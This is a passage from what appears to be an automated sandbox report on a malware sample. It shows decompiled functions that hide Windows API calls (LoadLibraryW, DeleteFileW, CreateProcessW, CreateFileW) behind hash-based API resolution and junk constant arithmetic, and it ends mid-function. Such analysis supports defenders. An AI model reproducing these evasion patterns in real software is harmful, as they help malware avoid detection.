c3c1b8 5207->5208 5209 c3e1f8 2 API calls 5208->5209 5216 c3c229 5208->5216 5210 c3c1d6 5209->5210 5211 c42d0a GetPEB 5210->5211 5212 c3c1ff 5211->5212 5213 c3fecb GetPEB 5212->5213 5214 c3c212 5213->5214 5215 c2d061 2 API calls 5214->5215 5215->5216

                                                                                                                                                                            Executed Functions

                                                                                                                                                                            Control-flow Graph

                                                                                                                                                                            • Executed
                                                                                                                                                                            • Not Executed
                                                                                                                                                                            control_flow_graph 455 c252b9-c25385 call c3fe29 call c2eb52 LoadLibraryW
                                                                                                                                                                            C-Code - Quality: 82%
                                                                                                                                                                            			E00C252B9(WCHAR* __ecx, void* __edx, intOrPtr _a4, intOrPtr _a8, intOrPtr _a12) {
                                                                                                                                                                            				signed int _v8;
                                                                                                                                                                            				signed int _v12;
                                                                                                                                                                            				signed int _v16;
                                                                                                                                                                            				signed int _v20;
                                                                                                                                                                            				signed int _v24;
                                                                                                                                                                            				intOrPtr _v28;
                                                                                                                                                                            				void* _t47;
                                                                                                                                                                            				struct HINSTANCE__* _t59;
                                                                                                                                                                            				signed int _t61;
                                                                                                                                                                            				signed int _t62;
                                                                                                                                                                            				WCHAR* _t68;
                                                                                                                                                                            
                                                                                                                                                                            				_push(_a12);
                                                                                                                                                                            				_t68 = __ecx;
                                                                                                                                                                            				_push(_a8);
                                                                                                                                                                            				_push(_a4);
                                                                                                                                                                            				_push(__ecx);
                                                                                                                                                                            				E00C3FE29(_t47);
                                                                                                                                                                            				_v24 = _v24 & 0x00000000;
                                                                                                                                                                            				_v28 = 0x68392e;
                                                                                                                                                                            				_v16 = 0xf5950b;
                                                                                                                                                                            				_v16 = _v16 ^ 0xb3325752;
                                                                                                                                                                            				_v16 = _v16 ^ 0xe58473b2;
                                                                                                                                                                            				_v16 = _v16 ^ 0x56462a2c;
                                                                                                                                                                            				_v8 = 0x3988bb;
                                                                                                                                                                            				_t61 = 0x3a;
                                                                                                                                                                            				_v8 = _v8 / _t61;
                                                                                                                                                                            				_v8 = _v8 + 0xf338;
                                                                                                                                                                            				_v8 = _v8 << 5;
                                                                                                                                                                            				_v8 = _v8 ^ 0x0035ea14;
                                                                                                                                                                            				_v12 = 0xe53120;
                                                                                                                                                                            				_v12 = _v12 ^ 0xa236e8c8;
                                                                                                                                                                            				_t62 = 0x62;
                                                                                                                                                                            				_v12 = _v12 / _t62;
                                                                                                                                                                            				_v12 = _v12 ^ 0x01ab7b97;
                                                                                                                                                                            				_v20 = 0x973198;
                                                                                                                                                                            				_v20 = _v20 * 0x60;
                                                                                                                                                                            				_v20 = _v20 ^ 0x38bce55b;
                                                                                                                                                                            				E00C2EB52(_t62, _t62, 0xeec842c3, 0xab, 0xa2289af1);
                                                                                                                                                                            				_t59 = LoadLibraryW(_t68); // executed
                                                                                                                                                                            				return _t59;
                                                                                                                                                                            			}














                                                                                                                                                                            0x00c252c0
                                                                                                                                                                            0x00c252c3
                                                                                                                                                                            0x00c252c5
                                                                                                                                                                            0x00c252c8
                                                                                                                                                                            0x00c252cc
                                                                                                                                                                            0x00c252cd
                                                                                                                                                                            0x00c252d2
                                                                                                                                                                            0x00c252d9
                                                                                                                                                                            0x00c252e2
                                                                                                                                                                            0x00c252e9
                                                                                                                                                                            0x00c252f0
                                                                                                                                                                            0x00c252f7
                                                                                                                                                                            0x00c252fe
                                                                                                                                                                            0x00c2530a
                                                                                                                                                                            0x00c2530f
                                                                                                                                                                            0x00c25314
                                                                                                                                                                            0x00c2531b
                                                                                                                                                                            0x00c2531f
                                                                                                                                                                            0x00c25326
                                                                                                                                                                            0x00c2532d
                                                                                                                                                                            0x00c25337
                                                                                                                                                                            0x00c2533f
                                                                                                                                                                            0x00c25342
                                                                                                                                                                            0x00c25349
                                                                                                                                                                            0x00c25360
                                                                                                                                                                            0x00c25363
                                                                                                                                                                            0x00c25376
                                                                                                                                                                            0x00c2537f
                                                                                                                                                                            0x00c25385

                                                                                                                                                                            APIs
                                                                                                                                                                            Strings
                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                            • Source File: 00000007.00000002.263561510.0000000000C21000.00000020.00000001.sdmp, Offset: 00C20000, based on PE: true
                                                                                                                                                                            • Associated: 00000007.00000002.263555474.0000000000C20000.00000004.00000001.sdmp Download File
                                                                                                                                                                            • Associated: 00000007.00000002.263585875.0000000000C46000.00000004.00000001.sdmp Download File
                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                            • Snapshot File: hcaresult_7_2_c20000_rundll32.jbxd
                                                                                                                                                                            Yara matches
                                                                                                                                                                            Similarity
                                                                                                                                                                            • API ID: LibraryLoad
                                                                                                                                                                            • String ID: 1$,*FV$.9h
                                                                                                                                                                            • API String ID: 1029625771-1870595533
                                                                                                                                                                            • Opcode ID: 47e2a649f6d09089b8114036349e08445583c90553a88ce36019ef6e82d966d0
                                                                                                                                                                            • Instruction ID: 308a821a7f86fd64e8b9d25cd4784e485e64bf33189ed6e1010e6d8387cbb274
                                                                                                                                                                            • Opcode Fuzzy Hash: 47e2a649f6d09089b8114036349e08445583c90553a88ce36019ef6e82d966d0
                                                                                                                                                                            • Instruction Fuzzy Hash: 562153B6D00208FBEF08DFA8D94A9EEBBB5FB40304F108198E815B6251E3B45B14DF90
                                                                                                                                                                            Uniqueness

                                                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                                                            Control-flow Graph

                                                                                                                                                                            C-Code - Quality: 95%
                                                                                                                                                                            			E00C41538(void* __ecx, void* __edx, void* _a4) {
                                                                                                                                                                            				signed int _v8;
                                                                                                                                                                            				signed int _v12;
                                                                                                                                                                            				signed int _v16;
                                                                                                                                                                            				signed int _v20;
                                                                                                                                                                            				signed int _v24;
                                                                                                                                                                            				intOrPtr _v28;
                                                                                                                                                                            				intOrPtr _v32;
                                                                                                                                                                            				void* _t59;
                                                                                                                                                                            				int _t75;
                                                                                                                                                                            				signed int _t77;
                                                                                                                                                                            				signed int _t78;
                                                                                                                                                                            				signed int _t79;
                                                                                                                                                                            				signed int _t80;
                                                                                                                                                                            
                                                                                                                                                                            				_push(_a4);
                                                                                                                                                                            				E00C3FE29(_t59);
                                                                                                                                                                            				_v24 = _v24 & 0x00000000;
                                                                                                                                                                            				_v32 = 0x73095a;
                                                                                                                                                                            				_v28 = 0xd34a52;
                                                                                                                                                                            				_v16 = 0xb3a153;
                                                                                                                                                                            				_t77 = 0x73;
                                                                                                                                                                            				_v16 = _v16 / _t77;
                                                                                                                                                                            				_v16 = _v16 + 0x4fd2;
                                                                                                                                                                            				_v16 = _v16 ^ 0xee3af97f;
                                                                                                                                                                            				_v16 = _v16 ^ 0xee3510f4;
                                                                                                                                                                            				_v20 = 0xee2064;
                                                                                                                                                                            				_v20 = _v20 << 0xe;
                                                                                                                                                                            				_v20 = _v20 ^ 0x88190a0a;
                                                                                                                                                                            				_v12 = 0x72c7a5;
                                                                                                                                                                            				_v12 = _v12 + 0x7839;
                                                                                                                                                                            				_t78 = 0x77;
                                                                                                                                                                            				_v12 = _v12 / _t78;
                                                                                                                                                                            				_t79 = 0x76;
                                                                                                                                                                            				_v12 = _v12 / _t79;
                                                                                                                                                                            				_v12 = _v12 ^ 0x00040652;
                                                                                                                                                                            				_v8 = 0x10c7fb;
                                                                                                                                                                            				_t80 = 0x6c;
                                                                                                                                                                            				_v8 = _v8 * 0x70;
                                                                                                                                                                            				_v8 = _v8 << 8;
                                                                                                                                                                            				_v8 = _v8 / _t80;
                                                                                                                                                                            				_v8 = _v8 ^ 0x00c83f8f;
                                                                                                                                                                            				E00C2EB52(_t80, _t80, 0x2aa4bac1, 0x108, 0xa2289af1);
                                                                                                                                                                            				_t75 = FindCloseChangeNotification(_a4); // executed
                                                                                                                                                                            				return _t75;
                                                                                                                                                                            			}
















                                                                                                                                                                            0x00c4153e
                                                                                                                                                                            0x00c41543
                                                                                                                                                                            0x00c41548
                                                                                                                                                                            0x00c4154f
                                                                                                                                                                            0x00c41558
                                                                                                                                                                            0x00c4155f
                                                                                                                                                                            0x00c4156b
                                                                                                                                                                            0x00c41570
                                                                                                                                                                            0x00c41575
                                                                                                                                                                            0x00c4157c
                                                                                                                                                                            0x00c41583
                                                                                                                                                                            0x00c4158a
                                                                                                                                                                            0x00c41591
                                                                                                                                                                            0x00c41595
                                                                                                                                                                            0x00c4159c
                                                                                                                                                                            0x00c415a3
                                                                                                                                                                            0x00c415ad
                                                                                                                                                                            0x00c415b2
                                                                                                                                                                            0x00c415ba
                                                                                                                                                                            0x00c415bf
                                                                                                                                                                            0x00c415c4
                                                                                                                                                                            0x00c415cb
                                                                                                                                                                            0x00c415d6
                                                                                                                                                                            0x00c415e6
                                                                                                                                                                            0x00c415e9
                                                                                                                                                                            0x00c415f3
                                                                                                                                                                            0x00c415f6
                                                                                                                                                                            0x00c4160a
                                                                                                                                                                            0x00c41615
                                                                                                                                                                            0x00c4161a

                                                                                                                                                                            APIs
                                                                                                                                                                            • FindCloseChangeNotification.KERNEL32(00040652), ref: 00C41615
                                                                                                                                                                            Strings
                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                            • Source File: 00000007.00000002.263561510.0000000000C21000.00000020.00000001.sdmp, Offset: 00C20000, based on PE: true
                                                                                                                                                                            • Associated: 00000007.00000002.263555474.0000000000C20000.00000004.00000001.sdmp Download File
                                                                                                                                                                            • Associated: 00000007.00000002.263585875.0000000000C46000.00000004.00000001.sdmp Download File
                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                            • Snapshot File: hcaresult_7_2_c20000_rundll32.jbxd
                                                                                                                                                                            Yara matches
                                                                                                                                                                            Similarity
                                                                                                                                                                            • API ID: ChangeCloseFindNotification
                                                                                                                                                                            • String ID: Zs$d
                                                                                                                                                                            • API String ID: 2591292051-3879001491
                                                                                                                                                                            • Opcode ID: 38bb643fa24bb4614003e7abf6af2ef3a1b5f649b6f440d52b37eb84a0984821
                                                                                                                                                                            • Instruction ID: 8cd89185ca04e8f4b851b8dc1116b2ba8723d28087856d8e788228c1409a081a
                                                                                                                                                                            • Opcode Fuzzy Hash: 38bb643fa24bb4614003e7abf6af2ef3a1b5f649b6f440d52b37eb84a0984821
                                                                                                                                                                            • Instruction Fuzzy Hash: FF214CB5D00209FBEB04DFA5D84A99DBBB1EB40304F10C099E618B7250D7B95B548F80
                                                                                                                                                                            Uniqueness

                                                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                                                            Control-flow Graph

                                                                                                                                                                            • Executed
                                                                                                                                                                            • Not Executed
                                                                                                                                                                            control_flow_graph 530 c2d061-c2d14b call c3fe29 call c2eb52 DeleteFileW
                                                                                                                                                                            C-Code - Quality: 85%
                                                                                                                                                                            			E00C2D061(WCHAR* __ecx, void* __edx, intOrPtr _a4, intOrPtr _a8, intOrPtr _a12) {
                                                                                                                                                                            				signed int _v8;
                                                                                                                                                                            				signed int _v12;
                                                                                                                                                                            				signed int _v16;
                                                                                                                                                                            				signed int _v20;
                                                                                                                                                                            				signed int _v24;
                                                                                                                                                                            				signed int _v28;
                                                                                                                                                                            				intOrPtr _v32;
                                                                                                                                                                            				intOrPtr _v36;
                                                                                                                                                                            				void* _t54;
                                                                                                                                                                            				int _t63;
                                                                                                                                                                            				signed int _t65;
                                                                                                                                                                            				WCHAR* _t69;
                                                                                                                                                                            
                                                                                                                                                                            				_push(_a12);
                                                                                                                                                                            				_t69 = __ecx;
                                                                                                                                                                            				_push(_a8);
                                                                                                                                                                            				_push(_a4);
                                                                                                                                                                            				_push(__ecx);
                                                                                                                                                                            				E00C3FE29(_t54);
                                                                                                                                                                            				_v28 = _v28 & 0x00000000;
                                                                                                                                                                            				_v24 = _v24 & 0x00000000;
                                                                                                                                                                            				_v36 = 0xa62646;
                                                                                                                                                                            				_v32 = 0x27199b;
                                                                                                                                                                            				_v20 = 0x942c55;
                                                                                                                                                                            				_v20 = _v20 | 0xf0368afe;
                                                                                                                                                                            				_v20 = _v20 << 0xa;
                                                                                                                                                                            				_v20 = _v20 ^ 0xfbcaf84d;
                                                                                                                                                                            				_v20 = _v20 ^ 0x217d6c33;
                                                                                                                                                                            				_v16 = 0xf28622;
                                                                                                                                                                            				_v16 = _v16 >> 0xe;
                                                                                                                                                                            				_v16 = _v16 | 0xeb4a9877;
                                                                                                                                                                            				_v16 = _v16 ^ 0x2aded5e4;
                                                                                                                                                                            				_v16 = _v16 ^ 0xc19eb21f;
                                                                                                                                                                            				_v12 = 0x4a5837;
                                                                                                                                                                            				_v12 = _v12 ^ 0xa3e571b7;
                                                                                                                                                                            				_v12 = _v12 + 0xffff6305;
                                                                                                                                                                            				_t65 = 0x6e;
                                                                                                                                                                            				_v12 = _v12 / _t65;
                                                                                                                                                                            				_v12 = _v12 ^ 0x01794185;
                                                                                                                                                                            				_v8 = 0xa209ee;
                                                                                                                                                                            				_v8 = _v8 + 0x62d2;
                                                                                                                                                                            				_v8 = _v8 ^ 0x3d892cf6;
                                                                                                                                                                            				_v8 = _v8 | 0x5ca7d1ce;
                                                                                                                                                                            				_v8 = _v8 ^ 0x7da8dabc;
                                                                                                                                                                            				E00C2EB52(_t65, _t65, 0x74c3d0b1, 0x1a1, 0xa2289af1);
                                                                                                                                                                            				_t63 = DeleteFileW(_t69); // executed
                                                                                                                                                                            				return _t63;
                                                                                                                                                                            			}















                                                                                                                                                                            0x00c2d068
                                                                                                                                                                            0x00c2d06b
                                                                                                                                                                            0x00c2d06d
                                                                                                                                                                            0x00c2d070
                                                                                                                                                                            0x00c2d074
                                                                                                                                                                            0x00c2d075
                                                                                                                                                                            0x00c2d07a
                                                                                                                                                                            0x00c2d081
                                                                                                                                                                            0x00c2d087
                                                                                                                                                                            0x00c2d08e
                                                                                                                                                                            0x00c2d095
                                                                                                                                                                            0x00c2d09c
                                                                                                                                                                            0x00c2d0a3
                                                                                                                                                                            0x00c2d0a7
                                                                                                                                                                            0x00c2d0ae
                                                                                                                                                                            0x00c2d0b5
                                                                                                                                                                            0x00c2d0bc
                                                                                                                                                                            0x00c2d0c0
                                                                                                                                                                            0x00c2d0c7
                                                                                                                                                                            0x00c2d0ce
                                                                                                                                                                            0x00c2d0d5
                                                                                                                                                                            0x00c2d0dc
                                                                                                                                                                            0x00c2d0e3
                                                                                                                                                                            0x00c2d0ef
                                                                                                                                                                            0x00c2d0f7
                                                                                                                                                                            0x00c2d0fa
                                                                                                                                                                            0x00c2d101
                                                                                                                                                                            0x00c2d108
                                                                                                                                                                            0x00c2d10f
                                                                                                                                                                            0x00c2d116
                                                                                                                                                                            0x00c2d11d
                                                                                                                                                                            0x00c2d13c
                                                                                                                                                                            0x00c2d145
                                                                                                                                                                            0x00c2d14b

                                                                                                                                                                            APIs
                                                                                                                                                                            • DeleteFileW.KERNEL32(?,?,?,?,?,?,?,?,?,?,00000000), ref: 00C2D145
                                                                                                                                                                            Strings
                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                            • Source File: 00000007.00000002.263561510.0000000000C21000.00000020.00000001.sdmp, Offset: 00C20000, based on PE: true
                                                                                                                                                                            • Associated: 00000007.00000002.263555474.0000000000C20000.00000004.00000001.sdmp Download File
                                                                                                                                                                            • Associated: 00000007.00000002.263585875.0000000000C46000.00000004.00000001.sdmp Download File
                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                            • Snapshot File: hcaresult_7_2_c20000_rundll32.jbxd
                                                                                                                                                                            Yara matches
                                                                                                                                                                            Similarity
                                                                                                                                                                            • API ID: DeleteFile
                                                                                                                                                                            • String ID: 3l}!$7XJ
                                                                                                                                                                            • API String ID: 4033686569-2205417827
                                                                                                                                                                            • Opcode ID: 10709235247fc134180b3dbd0d2fc7697fcbb658dcad94b6e8f128d82acf9f3f
                                                                                                                                                                            • Instruction ID: f7f7e8729727b24ca097496e10bbfe78a9df60e927cceb75774a517a904302d8
                                                                                                                                                                            • Opcode Fuzzy Hash: 10709235247fc134180b3dbd0d2fc7697fcbb658dcad94b6e8f128d82acf9f3f
                                                                                                                                                                            • Instruction Fuzzy Hash: 0B2145B5D00318AFDF08DFA4C98A9DEFBB0FF14304F108188E966A6210D7B85B558F91
                                                                                                                                                                            Uniqueness

                                                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                                                            C-Code - Quality: 51%
                                                                                                                                                                            			E00C42C24(WCHAR* __ecx, void* __edx, intOrPtr _a12, intOrPtr _a20, int _a24, intOrPtr _a28, struct _STARTUPINFOW* _a32, intOrPtr _a40, intOrPtr _a44, WCHAR* _a52, struct _PROCESS_INFORMATION* _a56) {
                                                                                                                                                                            				signed int _v8;
                                                                                                                                                                            				signed int _v12;
                                                                                                                                                                            				signed int _v16;
                                                                                                                                                                            				signed int _v20;
                                                                                                                                                                            				struct _SECURITY_ATTRIBUTES* _v24;
                                                                                                                                                                            				struct _SECURITY_ATTRIBUTES* _v28;
                                                                                                                                                                            				intOrPtr _v32;
                                                                                                                                                                            				void* _t49;
                                                                                                                                                                            				int _t56;
                                                                                                                                                                            				WCHAR* _t60;
                                                                                                                                                                            
                                                                                                                                                                            				_push(_a56);
                                                                                                                                                                            				_t60 = __ecx;
                                                                                                                                                                            				_push(_a52);
                                                                                                                                                                            				_push(0);
                                                                                                                                                                            				_push(_a44);
                                                                                                                                                                            				_push(_a40);
                                                                                                                                                                            				_push(0);
                                                                                                                                                                            				_push(_a32);
                                                                                                                                                                            				_push(_a28);
                                                                                                                                                                            				_push(_a24);
                                                                                                                                                                            				_push(_a20);
                                                                                                                                                                            				_push(0);
                                                                                                                                                                            				_push(_a12);
                                                                                                                                                                            				_push(0);
                                                                                                                                                                            				_push(0);
                                                                                                                                                                            				_push(__ecx);
                                                                                                                                                                            				E00C3FE29(_t49);
                                                                                                                                                                            				_v32 = 0x534833;
                                                                                                                                                                            				_v28 = 0;
                                                                                                                                                                            				_v24 = 0;
                                                                                                                                                                            				_v8 = 0x70adbe;
                                                                                                                                                                            				_v8 = _v8 >> 5;
                                                                                                                                                                            				_v8 = _v8 << 0xa;
                                                                                                                                                                            				_v8 = _v8 | 0x1d11c356;
                                                                                                                                                                            				_v8 = _v8 ^ 0x1f145645;
                                                                                                                                                                            				_v20 = 0xecea8a;
                                                                                                                                                                            				_v20 = _v20 | 0x5baa72b8;
                                                                                                                                                                            				_v20 = _v20 ^ 0x5be1d11d;
                                                                                                                                                                            				_v16 = 0x76217f;
                                                                                                                                                                            				_v16 = _v16 >> 0x10;
                                                                                                                                                                            				_v16 = _v16 | 0xe98780dc;
                                                                                                                                                                            				_v16 = _v16 ^ 0xe98c1e91;
                                                                                                                                                                            				_v12 = 0xeb975;
                                                                                                                                                                            				_v12 = _v12 ^ 0xd8138edb;
                                                                                                                                                                            				_v12 = _v12 | 0x0b4171d5;
                                                                                                                                                                            				_v12 = _v12 ^ 0xdb5d9300;
                                                                                                                                                                            				E00C2EB52(__ecx, __ecx, 0xb7160725, 0x75, 0xa2289af1);
                                                                                                                                                                            				_t56 = CreateProcessW(_a52, _t60, 0, 0, _a24, 0, 0, 0, _a32, _a56); // executed
                                                                                                                                                                            				return _t56;
                                                                                                                                                                            			}













                                                                                                                                                                            0x00c42c2c
                                                                                                                                                                            0x00c42c31
                                                                                                                                                                            0x00c42c33
                                                                                                                                                                            0x00c42c36
                                                                                                                                                                            0x00c42c37
                                                                                                                                                                            0x00c42c3a
                                                                                                                                                                            0x00c42c3d
                                                                                                                                                                            0x00c42c3e
                                                                                                                                                                            0x00c42c41
                                                                                                                                                                            0x00c42c44
                                                                                                                                                                            0x00c42c47
                                                                                                                                                                            0x00c42c4a
                                                                                                                                                                            0x00c42c4b
                                                                                                                                                                            0x00c42c4e
                                                                                                                                                                            0x00c42c4f
                                                                                                                                                                            0x00c42c51
                                                                                                                                                                            0x00c42c52
                                                                                                                                                                            0x00c42c57
                                                                                                                                                                            0x00c42c61
                                                                                                                                                                            0x00c42c64
                                                                                                                                                                            0x00c42c67
                                                                                                                                                                            0x00c42c6e
                                                                                                                                                                            0x00c42c72
                                                                                                                                                                            0x00c42c76
                                                                                                                                                                            0x00c42c7d
                                                                                                                                                                            0x00c42c84
                                                                                                                                                                            0x00c42c8b
                                                                                                                                                                            0x00c42c92
                                                                                                                                                                            0x00c42c99
                                                                                                                                                                            0x00c42ca0
                                                                                                                                                                            0x00c42ca4
                                                                                                                                                                            0x00c42cab
                                                                                                                                                                            0x00c42cb2
                                                                                                                                                                            0x00c42cb9
                                                                                                                                                                            0x00c42cc0
                                                                                                                                                                            0x00c42cc7
                                                                                                                                                                            0x00c42ce8
                                                                                                                                                                            0x00c42d02
                                                                                                                                                                            0x00c42d09

                                                                                                                                                                            APIs
                                                                                                                                                                            • CreateProcessW.KERNEL32(?,2E751909,00000000,00000000,00534833,00000000,00000000,00000000,?,?), ref: 00C42D02
                                                                                                                                                                            Strings
                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                            • Source File: 00000007.00000002.263561510.0000000000C21000.00000020.00000001.sdmp, Offset: 00C20000, based on PE: true
                                                                                                                                                                            • Associated: 00000007.00000002.263555474.0000000000C20000.00000004.00000001.sdmp Download File
                                                                                                                                                                            • Associated: 00000007.00000002.263585875.0000000000C46000.00000004.00000001.sdmp Download File
                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                            • Snapshot File: hcaresult_7_2_c20000_rundll32.jbxd
                                                                                                                                                                            Yara matches
                                                                                                                                                                            Similarity
                                                                                                                                                                            • API ID: CreateProcess
                                                                                                                                                                            • String ID: 3HS
                                                                                                                                                                            • API String ID: 963392458-330188696
                                                                                                                                                                            • Opcode ID: b0049691a906c617faab48a03f019d00495406e067b30e8a3afe4c22a13f3ee0
                                                                                                                                                                            • Instruction ID: 9fdb7a451e328159b9f07912edfdbcdebe803baad51c080b698f1234ddd6cf34
                                                                                                                                                                            • Opcode Fuzzy Hash: b0049691a906c617faab48a03f019d00495406e067b30e8a3afe4c22a13f3ee0
                                                                                                                                                                            • Instruction Fuzzy Hash: F021F372800248BBCF159F96DC0ACDFBFB9EF85700F108198F915A2220C3B58A24DFA0
                                                                                                                                                                            Uniqueness

                                                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                                                            C-Code - Quality: 56%
                                                                                                                                                                            			E00C445CA(WCHAR* __ecx, void* __edx, intOrPtr _a12, intOrPtr _a16, intOrPtr _a20, long _a24, intOrPtr _a28, intOrPtr _a32, long _a36, intOrPtr _a40, long _a44, long _a48) {
                                                                                                                                                                            				signed int _v8;
                                                                                                                                                                            				signed int _v12;
                                                                                                                                                                            				signed int _v16;
                                                                                                                                                                            				signed int _v20;
                                                                                                                                                                            				struct _SECURITY_ATTRIBUTES* _v24;
                                                                                                                                                                            				intOrPtr _v28;
                                                                                                                                                                            				void* _t51;
                                                                                                                                                                            				void* _t60;
                                                                                                                                                                            				WCHAR* _t64;
                                                                                                                                                                            
                                                                                                                                                                            				_push(_a48);
                                                                                                                                                                            				_t64 = __ecx;
                                                                                                                                                                            				_push(_a44);
                                                                                                                                                                            				_push(_a40);
                                                                                                                                                                            				_push(_a36);
                                                                                                                                                                            				_push(_a32);
                                                                                                                                                                            				_push(_a28);
                                                                                                                                                                            				_push(_a24);
                                                                                                                                                                            				_push(_a20);
                                                                                                                                                                            				_push(_a16);
                                                                                                                                                                            				_push(_a12);
                                                                                                                                                                            				_push(0);
                                                                                                                                                                            				_push(0);
                                                                                                                                                                            				_push(__ecx);
                                                                                                                                                                            				E00C3FE29(_t51);
                                                                                                                                                                            				_v28 = 0x204d4f;
                                                                                                                                                                            				_v24 = 0;
                                                                                                                                                                            				_v20 = 0xd27984;
                                                                                                                                                                            				_v20 = _v20 | 0x43788b11;
                                                                                                                                                                            				_v20 = _v20 ^ 0x43f3df42;
                                                                                                                                                                            				_v16 = 0xf976f1;
                                                                                                                                                                            				_v16 = _v16 + 0xffff3d74;
                                                                                                                                                                            				_v16 = _v16 | 0xfc5c4419;
                                                                                                                                                                            				_v16 = _v16 ^ 0xfcfdb6fc;
                                                                                                                                                                            				_v12 = 0xb7df7c;
                                                                                                                                                                            				_v12 = _v12 + 0xffff3658;
                                                                                                                                                                            				_v12 = _v12 * 0x13;
                                                                                                                                                                            				_v12 = _v12 ^ 0x1f30f970;
                                                                                                                                                                            				_v12 = _v12 ^ 0x12ab006a;
                                                                                                                                                                            				_v8 = 0x8ba8ca;
                                                                                                                                                                            				_v8 = _v8 | 0x62aa166a;
                                                                                                                                                                            				_v8 = _v8 + 0xa2f6;
                                                                                                                                                                            				_v8 = _v8 * 0x55;
                                                                                                                                                                            				_v8 = _v8 ^ 0xc33acf6c;
                                                                                                                                                                            				E00C2EB52(__ecx, __ecx, 0xbc17bbde, 0x19f, 0xa2289af1);
                                                                                                                                                                            				_t60 = CreateFileW(_t64, _a24, _a48, 0, _a44, _a36, 0); // executed
                                                                                                                                                                            				return _t60;
                                                                                                                                                                            			}












                                                                                                                                                                            0x00c445d2
                                                                                                                                                                            0x00c445d7
                                                                                                                                                                            0x00c445d9
                                                                                                                                                                            0x00c445dc
                                                                                                                                                                            0x00c445df
                                                                                                                                                                            0x00c445e2
                                                                                                                                                                            0x00c445e5
                                                                                                                                                                            0x00c445e8
                                                                                                                                                                            0x00c445eb
                                                                                                                                                                            0x00c445ee
                                                                                                                                                                            0x00c445f1
                                                                                                                                                                            0x00c445f4
                                                                                                                                                                            0x00c445f5
                                                                                                                                                                            0x00c445f7
                                                                                                                                                                            0x00c445f8
                                                                                                                                                                            0x00c445fd
                                                                                                                                                                            0x00c44607
                                                                                                                                                                            0x00c4460a
                                                                                                                                                                            0x00c44611
                                                                                                                                                                            0x00c44618
                                                                                                                                                                            0x00c4461f
                                                                                                                                                                            0x00c44626
                                                                                                                                                                            0x00c4462d
                                                                                                                                                                            0x00c44634
                                                                                                                                                                            0x00c4463b
                                                                                                                                                                            0x00c44642
                                                                                                                                                                            0x00c4465d
                                                                                                                                                                            0x00c44660
                                                                                                                                                                            0x00c44667
                                                                                                                                                                            0x00c4466e
                                                                                                                                                                            0x00c44675
                                                                                                                                                                            0x00c4467c
                                                                                                                                                                            0x00c44688
                                                                                                                                                                            0x00c4468b
                                                                                                                                                                            0x00c4469e
                                                                                                                                                                            0x00c446b5
                                                                                                                                                                            0x00c446bc

                                                                                                                                                                            APIs
                                                                                                                                                                            • CreateFileW.KERNEL32(?,00000057,?,00000000,?,?,00000000), ref: 00C446B5
                                                                                                                                                                            Strings
                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                            • Source File: 00000007.00000002.263561510.0000000000C21000.00000020.00000001.sdmp, Offset: 00C20000, based on PE: true
                                                                                                                                                                            • Associated: 00000007.00000002.263555474.0000000000C20000.00000004.00000001.sdmp Download File
                                                                                                                                                                            • Associated: 00000007.00000002.263585875.0000000000C46000.00000004.00000001.sdmp Download File
                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                            • Snapshot File: hcaresult_7_2_c20000_rundll32.jbxd
                                                                                                                                                                            Yara matches
                                                                                                                                                                            Similarity
                                                                                                                                                                            • API ID: CreateFile
                                                                                                                                                                            • String ID: OM
                                                                                                                                                                            • API String ID: 823142352-4198367855
                                                                                                                                                                            • Opcode ID: c9e2e688d9aa6a43dcdad6de9a4dd150b1ce22289e56966cf6fc1244f0671eef
                                                                                                                                                                            • Instruction ID: 56741004b0803f140ef3b3ec00dda51cea1e02a24a62057ac93051b09e2d6c4a
                                                                                                                                                                            • Opcode Fuzzy Hash: c9e2e688d9aa6a43dcdad6de9a4dd150b1ce22289e56966cf6fc1244f0671eef
                                                                                                                                                                            • Instruction Fuzzy Hash: 9E21EE72801249BBCF05DFA9CD46CDEBFB5EF88304F508199F914A6220D3768A61EF90
                                                                                                                                                                            Uniqueness

                                                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                                                            C-Code - Quality: 58%
                                                                                                                                                                            			E00C444FF(void* __ecx, void* __edx, intOrPtr _a8, intOrPtr _a16, intOrPtr _a20, intOrPtr _a24) {
                                                                                                                                                                            				unsigned int _v8;
                                                                                                                                                                            				signed int _v12;
                                                                                                                                                                            				signed int _v16;
                                                                                                                                                                            				signed int _v20;
                                                                                                                                                                            				void* _t47;
                                                                                                                                                                            				intOrPtr* _t57;
                                                                                                                                                                            				void* _t58;
                                                                                                                                                                            				signed int _t60;
                                                                                                                                                                            				signed int _t61;
                                                                                                                                                                            
                                                                                                                                                                            				E00C3FE29(_t47);
                                                                                                                                                                            				_v20 = 0xa68a31;
                                                                                                                                                                            				_t60 = 0x6d;
                                                                                                                                                                            				_v20 = _v20 / _t60;
                                                                                                                                                                            				_v20 = _v20 ^ 0x00000260;
                                                                                                                                                                            				_v16 = 0xfa9629;
                                                                                                                                                                            				_v16 = _v16 + 0x734b;
                                                                                                                                                                            				_v16 = _v16 ^ 0x638d356d;
                                                                                                                                                                            				_v16 = _v16 ^ 0x637ea9c8;
                                                                                                                                                                            				_v8 = 0x3f26ab;
                                                                                                                                                                            				_v8 = _v8 ^ 0xcdd207a4;
                                                                                                                                                                            				_v8 = _v8 ^ 0xb6eb62c4;
                                                                                                                                                                            				_v8 = _v8 >> 0xd;
                                                                                                                                                                            				_v8 = _v8 ^ 0x0005a548;
                                                                                                                                                                            				_v12 = 0xe291fe;
                                                                                                                                                                            				_t61 = 0x24;
                                                                                                                                                                            				_v12 = _v12 / _t61;
                                                                                                                                                                            				_v12 = _v12 + 0x3d74;
                                                                                                                                                                            				_v12 = _v12 ^ 0x00095158;
                                                                                                                                                                            				_t57 = E00C2EB52(_t61, _t61, 0x418e972c, 0x54, 0xa2289af1);
                                                                                                                                                                            				_t58 =  *_t57(_a24, 0, _a20, 0x28, __ecx, __edx, 0, _a8, 0x28, _a16, _a20, _a24); // executed
